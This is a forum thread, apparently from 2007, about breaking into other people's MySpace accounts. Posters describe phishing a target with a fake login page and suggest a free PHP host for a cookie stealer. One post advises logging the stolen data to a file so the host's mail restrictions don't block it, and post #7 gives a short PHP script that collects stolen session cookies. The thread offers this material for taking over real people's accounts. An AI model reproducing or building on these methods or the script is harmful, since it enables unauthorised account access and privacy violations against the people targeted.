hyperic
Closed Thread
Results 1 to 15 of 52

Thread: hack anyones myspace(WORKING!!)

Hybrid View

  1. #1
    Join Date
    Apr 2007
    Posts
    109
    I did not post a cookie stealer thats another way to get peoples password but one of the easiest ways is to message her and make the reply button the fake login. which is in one of the codes i posted

  2. #2
    Join Date
    Jun 2007
    Posts
    7
    Quote Originally Posted by dipman44 View Post
    I did not post a cookie stealer thats another way to get peoples password but one of the easiest ways is to message her and make the reply button the fake login. which is in one of the codes i posted
    The reply button method no longer works. It has been fixed by myspace, try it and see for yourself.

  3. #3
    Join Date
    Apr 2007
    Posts
    109
    Quote Originally Posted by Nivek View Post
    The reply button method no longer works. It has been fixed by myspace, try it and see for yourself.
    yes i know sorry about that everyone

  4. #4
    Join Date
    Jun 2007
    Posts
    7
    Quote Originally Posted by dipman44 View Post
    yes i know sorry about that everyone
    Hey dipman maybe when you get the time you can post a tutorial on how to gain access to a myspace account by using a cookie stealer?? People might have more success with that because only the dumbest of the dumb will fall for the fake login screen.

  5. #5
    Join Date
    Apr 2007
    Posts
    109
    Quote Originally Posted by Nivek View Post
    Hey dipman maybe when you get the time you can post a tutorial on how to gain access to a myspace account by using a cookie stealer?? People might have more success with that because only the dumbest of the dumb will fall for the fake login screen.
    well as soon as i can find a free php host that cookie stealers would work on i will but im having trouble finding one once i find one i will probably make a video tutorial for everyone.

  6. #6
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by dipman44 View Post
    well as soon as i can find a free php host that cookie stealers would work on i will but im having trouble finding one once i find one i will probably make a video tutorial for everyone.
    Try:

    [url]http://www.freehostia.com/free_hosting.html[/url]

    I've got like a whole load of hosting bookmarks; that's just one of them.

    If you use a free host, don't write the script to use the PHP mail function. They always disable that so stupid spammers can't spread their shit through the free service. Write it to log the info to a text file, then set permissions on the whole site (including htdocs) recursively to 755. It should work.

  7. #7
    Join Date
    Apr 2007
    Posts
    109
    Quote Originally Posted by mike*5* View Post
    Try:

    [url]http://www.freehostia.com/free_hosting.html[/url]

    I've got like a whole load of hosting bookmarks; that's just one of them.

    If you use a free host, don't write the script to use the PHP mail function. They always disable that so stupid spammers can't spread their shit through the free service. Write it to log the info to a text file, then set permissions on the whole site (including htdocs) recursively to 755. It should work.
    would this be how i would write the php?:
    <?php
    $cookie = $_GET['cookie'];
    $log = fopen("log.txt", "a");
    fwrite($log, $cookie ."\n");
    fclose($log);
    ?>

  8. #8
    Join Date
    Jun 2007
    Posts
    1
    Quote Originally Posted by dipman44 View Post
    I did not post a cookie stealer thats another way to get peoples password but one of the easiest ways is to message her and make the reply button the fake login. which is in one of the codes i posted
    where is that code i cant seem to find it??

Closed Thread

Similar Threads

  1. myspace hack
    By patton449 in forum Internet Privacy
    Replies: 187
    Last Post: 03-15-2007, 01:21 PM
  2. Myspace hack (yes I know there is already a thread on it)
    By Kasualty1990 in forum Internet Privacy
    Replies: 13
    Last Post: 01-19-2007, 08:53 PM
  3. How to hack Myspace...
    By Troll in forum Internet Privacy
    Replies: 34
    Last Post: 11-17-2006, 03:52 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts